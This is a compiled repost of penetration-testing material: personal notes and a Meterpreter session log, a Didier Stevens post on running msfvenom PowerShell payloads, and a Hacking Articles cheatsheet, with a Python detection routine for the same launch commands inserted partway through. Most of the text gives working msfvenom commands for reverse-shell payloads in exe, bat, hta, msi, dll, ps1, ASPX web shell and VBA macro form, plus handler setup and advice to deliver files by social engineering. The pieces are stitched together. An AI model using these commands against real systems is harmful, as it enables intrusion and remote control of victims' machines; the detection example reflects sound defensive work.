metasploit MSFVenom: generating a PowerShell payload. TODO: fileless attack, msiexec /quiet /qn /i shell.msi



msfvenom -p windows/x64/meterpreter_reverse_http -f psh -o m64.ps1 LHOST=

In msfconsole:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
payload => windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > exploit
[*] Started HTTP reverse handler on
[!] handling request from; (UUID: lmlpxkt7) Without a database connected that payload UUID tracking will not work!
[*] handling request from; (UUID: lmlpxkt7) Redirecting stageless connection from /5rMMt7IriBVkx2XFBrJyuAqt7PfOx9So1n4Jb6M7alIC-UAZ-At7iprx1gUhIiSCrgQz4CpvwuUHWx96HoMXJ67Uq7SZMmfSrm-p2EPPzJ9Dn3zVIbtqpc_Bv34 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[!] handling request from; (UUID: lmlpxkt7) Without a database connected that payload UUID tracking will not work!
[*] handling request from; (UUID: lmlpxkt7) Attaching orphaned/stageless session...
[!] handling request from; (UUID: lmlpxkt7) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened ( -> ) at 2022-05-06 08:37:20 -0400
meterpreter >
meterpreter > shell
Process 5932 created.
Channel 1 created.
Microsoft Windows [版本 10.0.19044.1645]
(c) Microsoft Corporation。保留所有权利。



powershell -NoExit -ExecutionPolicy Bypass -File m64.ps1




Generating PowerShell Scripts With MSFVenom On Windows

Filed under: Hacking — Didier Stevens @ 20:46

To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat --payload windows/x64/meterpreter_reverse_http --format psh --out meterpreter-64.ps1 LHOST=”:

The payload windows/x64/meterpreter_reverse_http is the Meterpreter payload for 64-bit Windows. Format psh is the format to use to generate a PowerShell script that will execute the payload (formats ps1 and powershell are transform formats, they do not generate a script that executes the payload).

A 32-bit payload is generated with this command “msfvenom.bat --payload windows/meterpreter_reverse_http --format psh --out meterpreter-32.ps1 LHOST=”:

Just as I showed in my post for .exe payloads, we start a handler like this:

Now we need to execute the PowerShell scripts. Just executing “powershell.exe -File meterpreter-64.ps1” will not work:

By default, .ps1 files are not executed. We can execute them by bypassing the policy “powershell.exe -ExecutionPolicy Bypass -File meterpreter-64.ps1”:

In this example, 948 is the handle to the thread created by CreateThread when the payload is executed.

But back in the Metasploit console, you will not see a connection. That’s because the PowerShell process terminates before the Meterpreter payload can fully execute: powershell.exe executes the script, which loads the Meterpreter payload in the powershell process, and then powershell.exe exits, i.e. the powershell process is terminated and thus the Meterpreter payload with it.

To give the Meterpreter payload the time to establish a connection, the powershell process must remain alive. We can do this by preventing powershell.exe from exiting with option -NoExit:

Now we get a connection:

This example was for a 64-bit payload on a 64-bit Windows machine.

The same command is used to execute the 32-bit payload on a 32-bit Windows machine (except for the filename, which is meterpreter-32.ps1 in our example).

To execute the 32-bit payload on a 64-bit Windows machine, we need to start 32-bit PowerShell, like this “c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1”:

This gives us 2 sessions:



Msfvenom Cheatsheet: Windows Exploitation

In this post, you will learn how to use MsfVenom to generate all types of payloads for exploiting the Windows platform. Read the beginner guide here.

Table of Content

  • Requirements
  • MsfVenom Syntax
  • Payload and its types
  • Executable Payload (exe)
  • Powershell Batch File
  • HTML Application Payload (HTA)
  • Microsoft Installer Payload (MSI)
  • Dynamic-link library Payload (DLL)
  • Powershell Payload (psh-cmd)
  • Powershell Payload (ps1)
  • Web shell Payload (ASPX)
  • Visual Basic Payload (.vba)


Requirements

  • Kali Linux
  • Windows Machine

MsfVenom Syntax

MsfVenom is a Metasploit standalone payload generator which is also a replacement for msfpayload and msfencode.

Payload and its types

Payloads are malicious scripts that an attacker uses to interact with a target machine in order to compromise it. Msfvenom supports the following platforms and formats to generate the payload. The output format can be an executable file such as exe, php or dll, or a one-liner.

Two major types of Payloads

Staged (stager): identified by a second slash (/) separating the stage from the stager, such as windows/meterpreter/reverse_tcp

Stageless: uses an underscore (_) instead of the second slash (/) in the payload name, such as windows/meterpreter_reverse_tcp

As we have mentioned above, this post may help you to learn all possible methods to generate various payload formats for exploiting the Windows Platform.

Executable Payload (exe)

Payload Type: Stager

Execute the following command to create a malicious exe file; .exe is the common filename extension denoting an executable file for Microsoft Windows.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f exe > shell.exe

Entire malicious code will be written inside the shell.exe file and will be executed as an exe program on the target machine.

Share this file using social engineering tactics and wait for target execution. Meanwhile, launch netcat as a listener for capturing reverse connection.

nc -lvp 443

Powershell Batch File

Payload Type: Stager

Execute the following command to create a malicious batch file; the filename extension .bat is used in DOS and Windows.

msfvenom -p cmd/windows/reverse_powershell lhost= lport=443 > shell.bat

The entire malicious code will be written inside the shell.bat file and will be executed as a .bat script on the target machine.

Share this file using social engineering tactics and wait for target execution. Meanwhile, launch netcat as the listener for capturing reverse connection.

nc -lvp 443

HTML Application Payload (HTA)

Payload Type: Stager

An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.

Execute the following command to create a malicious HTA file; the filename extension .hta is used in DOS and Windows.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f hta-psh > shell.hta

The entire malicious code will be written inside the shell.hta file and will be executed as an .hta script on the target machine. Use the Python HTTP server for file sharing.

An HTA is executed using the program mshta.exe or by double-clicking on the file.

This will bring a reverse connection to the netcat listener that was running in the background for capturing the reverse connection.

nc -lvp 443

Microsoft Installer Payload (MSI)

Windows Installer is also known as Microsoft Installer. An MSI file is a Windows package that provides installation information for a certain installer, such as the programs that need to be installed. It can be used to install Windows updates or third-party software, just like an exe.

Execute the following command to create a malicious MSI file; the filename extension .msi is used in DOS and Windows. Transfer the malicious file to the target system and execute it.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f msi > shell.msi

Use the command msiexec to run the MSI file.

msiexec /quiet /qn /i shell.msi

This will bring a reverse connection to the netcat listener that was running in the background for capturing the reverse connection.

Dynamic-link library Payload (DLL)

Payload Type: Stager

A DLL is a library that contains code and data that can be used by more than one program.

Execute the following command to create a malicious dll file; the filename extension .dll is used in DOS and Windows. Transfer the malicious file to the target system and execute it.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f dll > shell.dll

Use the command rundll32 to run the DLL file.

rundll32.exe shell.dll,0

This will bring a reverse connection to the netcat listener that was running in the background for capturing the reverse connection.

Powershell Payload (psh-cmd)

Payload Type: Stager

Format – psh, psh-net, psh-reflection, or psh-cmd

The generated payload for the psh, psh-net and psh-reflection formats has a .ps1 extension, and the generated payload for the psh-cmd format has a .cmd extension:

msfvenom -p cmd/windows/reverse_powershell lhost= lport=443 -f psh-cmd > shell.cmd

Alternatively, execute the following command to generate the raw code of the malicious PowerShell one-liner, which can be run directly in the Command Prompt of the target system.

msfvenom -p cmd/windows/reverse_powershell lhost= lport=443 -f raw

For execution, copy the generated code and paste it into the Windows command prompt.

This will bring a reverse connection to the netcat listener that was running in the background for capturing the reverse connection.

Powershell Payload (ps1)

Payload Type: Stager

A PS1 file is a script, or “cmdlet,” used by Windows PowerShell. PS1 files are similar to .BAT and .CMD files, except that they are executed in Windows PowerShell instead of the Windows Command Prompt.

Execute the following command to create a malicious PS1 script; the filename extension .PS1 is used in Windows PowerShell.

msfvenom -p windows/x64/meterpreter_reverse_https lhost= lport=443 -f psh > shell.ps1

Since the payload is a Meterpreter payload, we need to launch exploit/multi/handler inside the Metasploit Framework.

PowerShell’s execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts. By default it prevents running all script files, including formatting and configuration files (.ps1xml), module script files (.psm1), and PowerShell profiles (.ps1).

Read more from here

In order to execute the PS1 script, you need to bypass the execution policy by running the following command in the Windows PowerShell and executing the script.

PowerShell -ep bypass

use exploit/multi/handler
set lhost
set lport 443
set payload windows/x64/meterpreter_reverse_https

As soon as the target executes the shell.ps1 script, the attacker will get a reverse connection through a Meterpreter session.
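Detection logic for the execution commands these posts show (the -ExecutionPolicy Bypass / -NoExit PowerShell launch from Didier Stevens' walkthrough, and the mshta, msiexec /quiet /qn /i and rundll32 shell.dll,0 launches from the cheatsheet), as an added example that belongs to neither original post: a Python triage over constructed Sysmon-style process-creation events. The event layout, the indicator names, the decoy command lines and the assumption that -ep and -ex (and longer prefixes) are accepted spellings of -ExecutionPolicy are this example's own.

```python
import re

# Constructed Sysmon-style process-creation events (Image + CommandLine only),
# written for this example. The first five carry the command lines the posts
# above show; the last two are benign decoys that must not alert.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoExit -ExecutionPolicy Bypass -File m64.ps1"},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                    " -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /quiet /qn /i shell.msi"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell.dll,0"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe shell.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File Get-Inventory.ps1"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Windows\Installer\1a2b.msi"},
]

# -ep, -ex and longer prefixes are accepted spellings of -ExecutionPolicy (assumed).
PS_BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)
PS_NOEXIT_FILE = re.compile(r"-noexit\b.*-file\b|-file\b.*-noexit\b", re.I)
MSI_INSTALL, MSI_QUIET = re.compile(r"/i\b", re.I), re.compile(r"/(?:quiet|qn)\b", re.I)
RUNDLL_ARG = re.compile(r"rundll32(?:\.exe)?\s+(?P<dll>\S+?),(?P<entry>\S+)", re.I)

def triage(event):
    """Return the indicator names one process-creation event matches (may be empty)."""
    image, cmd, hits = event["Image"].lower(), event["CommandLine"], []
    if image.endswith("powershell.exe"):
        if PS_BYPASS.search(cmd):
            hits.append("powershell_execpolicy_bypass")
        if PS_NOEXIT_FILE.search(cmd):        # -NoExit keeps the host alive for the payload
            hits.append("powershell_noexit_file")
        if hits and "\\syswow64\\" in image:  # 32-bit host on a 64-bit box: context only
            hits.append("powershell_32bit_host")
    elif image.endswith("msiexec.exe"):       # silent install of a package
        if MSI_INSTALL.search(cmd) and MSI_QUIET.search(cmd):
            hits.append("msiexec_quiet_install")
    elif image.endswith("rundll32.exe"):      # DLL loaded from outside C:\Windows
        m = RUNDLL_ARG.search(cmd)
        if m and not m.group("dll").lower().startswith("c:\\windows\\"):
            hits.append("rundll32_nonsystem_dll")
    elif image.endswith("mshta.exe"):         # rarely legitimate; low-confidence on its own
        hits.append("mshta_launch")
    return hits
```

Running `[triage(e) for e in SAMPLE_EVENTS]` flags the five attacker-side launches and leaves both decoys empty, which is the check to keep when tuning the rules against real telemetry.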

Web shell Payload (ASPX)

Payload Type: Stageless

An ASPX file is an Active Server Page Extended file for Microsoft’s ASP.NET platform. When the URL is viewed, these pages are shown in the user’s web browser; .NET web forms are another name for them.

Execute the following command to create a malicious aspx script, which uses the filename extension .aspx.

msfvenom -p windows/x64/meterpreter/reverse_https lhost= lport=443 -f aspx > shell.aspx

Since the payload is a Meterpreter payload, we need to launch exploit/multi/handler inside the Metasploit Framework.

You can use this payload to exploit an Unrestricted File Upload vulnerability if the target is an IIS web server.

Execute the uploaded script by opening it in the web browser.

use exploit/multi/handler
set lhost
set lport 443
set payload windows/x64/meterpreter_reverse_https

As soon as the attacker executes the malicious script, they will get a reverse connection through a Meterpreter session.

Visual Basic Payload (.vba)

Payload Type: Stageless

VBA is a file extension commonly associated with Visual Basic, which supports Microsoft applications such as Microsoft Excel, Office, PowerPoint, Word, and Publisher. It is used to create “macros” that run within Excel. An attacker takes advantage of these features and creates a malicious VB script to be executed as a macro program with Microsoft Excel.

Execute the following command to create a malicious VBA script that will be executed as a macro within Microsoft Excel.

Read more from here: Multiple Ways to Exploit Windows Systems using Macros

msfvenom -p windows/x64/meterpreter/reverse_https lhost= lport=443 -f vba

Now we open our Workbook that has the malicious macros injected in it. A comprehensive method of macros execution is explained in our previous post.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost
set lport 1234

As soon as the attacker executes the malicious script, they will get a reverse connection through a Meterpreter session.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

posted @ bonelee